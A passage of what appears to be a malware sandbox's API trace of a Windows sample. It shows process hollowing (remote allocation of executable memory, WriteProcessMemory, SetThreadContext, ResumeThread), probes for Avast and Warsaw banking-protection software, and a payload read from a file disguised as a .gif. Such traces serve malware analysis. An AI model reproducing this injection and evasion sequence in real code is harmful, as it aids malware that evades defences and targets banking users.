[76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0117.064] ReadProcessMemory (in: hProcess=0xfc, lpBaseAddress=0x7ffd6008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0117.064] VirtualAllocEx (hProcess=0xfc, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0117.064] VirtualAlloc (lpAddress=0x191c000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x191c000
[0117.070] WriteProcessMemory (in: hProcess=0xfc, lpBaseAddress=0x400000, lpBuffer=0x1919860*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1919860*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0117.082] WriteProcessMemory (in: hProcess=0xfc, lpBaseAddress=0x7ffd6008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0117.083] SetThreadContext (hThread=0x100, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd6000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x1af9c0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0117.083] ResumeThread (hThread=0x100) returned 0x1
[0117.083] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0117.083] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0117.083] GlobalUnlock (hMem=0x95000c) returned 0
[0117.083] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0117.083] GlobalUnlock (hMem=0x950004) returned 0
[0117.090] Sleep (dwMilliseconds=0xe74e)
[0127.102] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0127.102] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0127.102] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0127.102] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0127.103] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108
[0127.103] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0127.103] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0127.103] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0127.103] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0127.105] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0127.105] ReadFile (in: hFile=0x108, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0127.113] CloseHandle (hObject=0x108) returned 1
[0127.113] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.114] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.114] GlobalUnlock (hMem=0x95000c) returned 0
[0127.114] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0127.114] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.115] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.115] GlobalUnlock (hMem=0x95000c) returned 0
[0127.115] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0127.115] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0127.116] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0127.116] GlobalUnlock (hMem=0x95000c) returned 0
[0127.116] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0127.117] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0127.118] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0127.118] GlobalUnlock (hMem=0x95000c) returned 0
[0127.118] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0127.118] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0127.119] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0127.119] GlobalUnlock (hMem=0x95000c) returned 0
[0127.119] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0127.119] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0127.120] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0127.120] GlobalUnlock (hMem=0x95000c) returned 0
[0127.120] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0127.121] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.122] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.122] GlobalUnlock (hMem=0x95000c) returned 0
[0127.122] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0127.123] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.123] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.123] GlobalUnlock (hMem=0x95000c) returned 0
[0127.123] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0127.123] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.124] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.124] GlobalUnlock (hMem=0x95000c) returned 0
[0127.124] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0127.124] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.125] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.125] GlobalUnlock (hMem=0x95000c) returned 0
[0127.125] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0127.125] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.126] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.126] GlobalUnlock (hMem=0x95000c) returned 0
[0127.126] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0127.126] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.127] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.127] GlobalUnlock (hMem=0x95000c) returned 0
[0127.127] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0127.127] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.128] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.128] GlobalUnlock (hMem=0x95000c) returned 0
[0127.128] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0127.128] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.129] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.129] GlobalUnlock (hMem=0x95000c) returned 0
[0127.129] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0127.129] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.129] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.130] GlobalUnlock (hMem=0x95000c) returned 0
[0127.130] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0127.130] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.130] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.130] GlobalUnlock (hMem=0x95000c) returned 0
[0127.130] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0127.132] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0127.133] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0127.133] GlobalUnlock (hMem=0x95000c) returned 0
[0127.133] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0127.133] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0127.134] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0127.134] GlobalUnlock (hMem=0x95000c) returned 0
[0127.134] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0127.136] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0127.137] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0127.137] GlobalUnlock (hMem=0x95000c) returned 0
[0127.137] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0127.137] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.137] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.137] GlobalUnlock (hMem=0x95000c) returned 0
[0127.137] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0127.137] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.138] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.138] GlobalUnlock (hMem=0x95000c) returned 0
[0127.138] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0127.138] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.139] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.139] GlobalUnlock (hMem=0x95000c) returned 0
[0127.139] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0127.139] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.140] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.140] GlobalUnlock (hMem=0x95000c) returned 0
[0127.140] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0127.140] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.140] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.140] GlobalUnlock (hMem=0x95000c) returned 0
[0127.140] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0127.140] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.141] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.141] GlobalUnlock (hMem=0x95000c) returned 0
[0127.141] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0127.141] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.142] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.142] GlobalUnlock (hMem=0x95000c) returned 0
[0127.142] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0127.142] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.142] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.143] GlobalUnlock (hMem=0x95000c) returned 0
[0127.143] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0127.143] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.143] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.143] GlobalUnlock (hMem=0x95000c) returned 0
[0127.143] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0127.143] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.144] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.144] GlobalUnlock (hMem=0x95000c) returned 0
